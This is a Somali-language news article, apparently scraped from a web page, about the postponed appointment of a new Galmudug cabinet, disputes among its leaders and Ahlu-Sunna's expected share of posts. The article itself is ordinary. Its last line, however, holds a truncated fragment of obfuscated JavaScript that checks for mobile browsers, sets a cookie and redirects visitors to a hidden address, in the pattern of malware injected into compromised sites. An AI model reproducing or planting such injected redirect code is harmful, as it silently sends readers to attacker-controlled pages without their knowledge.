Saxafiyiinta Magaalada Dhuusamareeb Ee Caasimada Dowlad Goboledka Galmudug Ayaa La Iskugu Yeeray Subaxii Hore Ee Axadii Maanta Xog Hordhaca oo Ay Heleena Waxaa uu Ahaa In La Magacaabayo Golaha Wasiirada Cusub Ee Galmudug.
Hayeeshee Taasi Maysan Dhicin Waxaa Aan Lamagacaabin Wasiiradii Sababta U Ween Waxaa Lagu Sheegay Laka Aragti Duwanaan Ka Dhex Jirta Hugaanka Sare Ee Galmudug Ee Ku Aadan Liiska Xubnaha Cusub.
Masuuliyiin Dhuusamareeb Ku Sugun Ayaa Codka Gobollada Dhexe U Xaqiijiyay In Inta Badan La Qoray Liiska Wasiirada Cusub Waxaan Ay Sheegeen In Ay Ka Soo dhex Muuqan Doonaan Xubnahan CusubA� Masuulinyiintii Maamulka Ahlu-suna Ee Ku Beeray Galmudug .
Madaxweyne Axmed Ducale Gele {Xaaf} Madaxweynaha Galmudug Ayaa Lagu Wadaa in uu Wasiiradiisa Magacaabo Marka uu Ka Soolaabto Shirka Madasha Iskaashiga Dowlad Goboleedyada Ee Todobadkan Ka Furmaya Magaalada Kismaayo Ee Xarunta Kumeelgaar Ah Ee Jubaland Oo Uu Maanta Gaaray Madaxweyne Xaaf
Dhinaca Kale Waxaan Lama Oga In uu Ay Gacan Ama La Tashiyo Ku Leeyihiin Madaxweyne Kuxigeenka Iyo Gudomiyaha Baarlamaanka Galmudug Magacaabista Xubnaha Cusub Maadaaba uu Khilaaf Ka dhexeeyo Madaxweyne Xaaf Iyo Shiikh Shaakir oo Ah Madaxa Xukuumada Haduusan Jirina Latashiyo Ay Ku Leeyihiin Waa Mid Sii Xoogeen Karta Muranka Iyo Kala Aragti Duwanaanta Hada Jirta Ee La Xariirta Magaacaabista Wasiirada Cusub
Su,aal Kale oo Dadku Isweydiinayaan Ayaa Ah Wasiirada Cusub Ma Kuwo Horleh oo La Magacaabayaa Mase WaaA� Isku Shaandheen Xubno Cusubna Meesha Imaanayaan Xubno Kalana Boosaska Baneenayaan Hadiise Ay Tahay Kow Iyo Magacaabis Cusub Maxaas Sababi Kara Maadaaba Halsano oo Qur Ah Ay Jiraan Wasiirada Hada Shaqeeya oo Horay uu U Magacaabay Madaxweyne Xaaf 21 Bishii Aug 2017
In Kastoo Aanan Helin Wali Cid Si Toos Ah Su,aalaasi Inooga Jawaabta Hadana Xogaha Aan Helayno Ayaa sheegay In Arintu Ay Tahay Hada Iyo Kow oo Wasiiro Cusub La Magacaabayo Jawaabo Aan Ilo Xog Ogaal Ah Ka Helnay Ayaa Muujinaya Waamida Kowbaade In Sababta U Weyne Ay Tahay Heshiiskii Ahlu-suna Iyo Galmudug Dhamaadkii Bishii Noveber Ay Ku Gaareen DalkaA� Jabuuti kaasi oo Ay Qeeb Ka Ahaayeen In La Mideeyo Labada Maamul Waa Tanxigteen In Ahlu-suna Lagu Qanciyo Wasiiro Aragtidooda Ah In Maamulka Ay Ka Dhex Arkaan
Waxaase Su,aal Kale Ay Tahay Xalka Galmudug Maku Jiraa In Wasiiro Cusub Lamagacaabo oo Xiligaan Khilaafka Kajiraa uu San Aheen Mid Xal Laga Gaaray Tankale Door Intee La Eg Ayay Ku Leeyihiin Waxgaradka Iyo Odayaal Dhaqameedku Xulista Wasiirada Cusub A�Waxaase Ilo Xog Ogagaal Ah Ay Inoo Sheegeen In uu Sanjirin Doorkii Dhaqanka Ee Ahaa La Tashiyada Magacaabista Wasiirada Cusub
Dhageyso:warbixib
|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}